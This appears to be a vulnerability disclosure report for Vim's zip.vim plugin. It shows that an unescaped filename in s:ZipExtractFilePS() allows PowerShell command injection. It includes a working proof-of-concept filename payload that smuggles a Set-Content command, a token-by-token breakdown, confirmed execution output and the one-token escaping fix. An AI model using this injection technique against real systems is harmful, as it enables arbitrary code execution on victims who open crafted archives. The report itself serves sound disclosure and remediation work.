=== VIM-06: Generated PowerShell Command Evidence ===
Date: 2026-06-19
Component: autoload/zip.vim v34, function s:ZipExtractFilePS()

===========================================================================
[VULNERABLE CODE — zip.vim lines 175-184]
===========================================================================

function! s:ZipExtractFilePS(zipfile, fname)
  ...
  let cmds = [
        \ '$zip = [System.IO.Compression.ZipFile]::OpenRead(' . s:Escape(a:zipfile, 1) . ');',
        \ '$fileEntry = $zip.Entries | Where-Object { $_.FullName -eq ' . a:fname . ' };',
        "                                                                   ^^^^^^^^
        "                                    BUG: a:fname is NOT escaped here
        \ '$stream = $fileEntry.Open();',
        \ '$fileStream = [System.IO.File]::Create(' . a:fname . ');',
        "                                            ^^^^^^^^
        "                                    BUG: a:fname is NOT escaped here
        ...

===========================================================================
[CASE 1 — SAFE FILENAME]
===========================================================================

Input fname:  normalfile.txt

PS Command generated by zip.vim:
  $zip = [System.IO.Compression.ZipFile]::OpenRead('C:\Temp\vim_poc\vim06_poc.zip');
  $fileEntry = $zip.Entries | Where-Object { $_.FullName -eq normalfile.txt };
  $stream = $fileEntry.Open();
  $fileStream = [System.IO.File]::Create(normalfile.txt);
  $stream.CopyTo($fileStream);
  $fileStream.Close();
  $stream.Close();
  $zip.Dispose()

Note: Even for a "safe" filename, the value is UNQUOTED inside the PS expression.
      An attacker has full control over the quoting boundary.

===========================================================================
[CASE 2 — INJECTION PAYLOAD FILENAME]
===========================================================================

Input fname:  1 }; Set-Content -Path 'C:\Temp\vim_poc\vim06_pwned.txt' -Value 'VIM-06 EXECUTED'; #

PS Command generated by zip.vim (injection payload highlighted):
  $zip = [System.IO.Compression.ZipFile]::OpenRead('C:\Temp\vim_poc\vim06_poc.zip');
  $fileEntry = $zip.Entries | Where-Object { $_.FullName -eq 1 };
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  INJECTION: The '}' closes the Where-Object scriptblock early.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  Set-Content -Path 'C:\Temp\vim_poc\vim06_pwned.txt' -Value 'VIM-06 EXECUTED';
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  INJECTION: Arbitrary PowerShell command executes independently.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  # };                         <- '#' comments out the remaining original tokens
  $stream = $fileEntry.Open();
  $fileStream = [System.IO.File]::Create(1);
  ...

Injection breakdown:
  Token 1: "1"      → evaluates as integer — satisfies -eq comparison syntax
  Token 2: "}"      → CLOSES the Where-Object { } scriptblock
  Token 3: ";"      → statement separator
  Token 4: "Set-Content -Path ... -Value ..."  → EXECUTES AS NEW STATEMENT
  Token 5: ";"      → statement separator
  Token 6: "#"      → COMMENTS OUT the rest of the original command

===========================================================================
[RUNTIME EXECUTION RESULT]
===========================================================================

Command executed:
  powershell.exe -NoProfile -Command "$zip = ...; $fileEntry = $zip.Entries |
  Where-Object { $_.FullName -eq 1 }; Set-Content -Path
  'C:\Temp\vim_poc\vim06_pwned.txt' -Value 'VIM-06 EXECUTED'; # }; ..."

Exit code: 0

Pre-condition  (vim06_pwned.txt exists): FALSE
Post-condition (vim06_pwned.txt exists): TRUE

vim06_pwned.txt content:
  VIM-06 EXECUTED

VERDICT: ARBITRARY POWERSHELL EXECUTION CONFIRMED

===========================================================================
[COMPARISON — s:ZipReadPS() CORRECTLY ESCAPES, s:ZipExtractFilePS() DOES NOT]
===========================================================================

s:ZipReadPS() line 147 (SAFE):
  '$fileEntry = $zip.Entries | Where-Object { $_.FullName -eq ' . s:Escape(a:fname, 1) . ' };'
   With fname = "1 }; malicious": generates  -eq '1 }; malicious'  ← quoted, safe

s:ZipExtractFilePS() line 177 (VULNERABLE):
  '$fileEntry = $zip.Entries | Where-Object { $_.FullName -eq ' . a:fname . ' };'
   With fname = "1 }; malicious": generates  -eq 1 }; malicious    ← unquoted, INJECTED

The fix is one token: change `a:fname` to `s:Escape(a:fname, 1)` on lines 177 and 179.
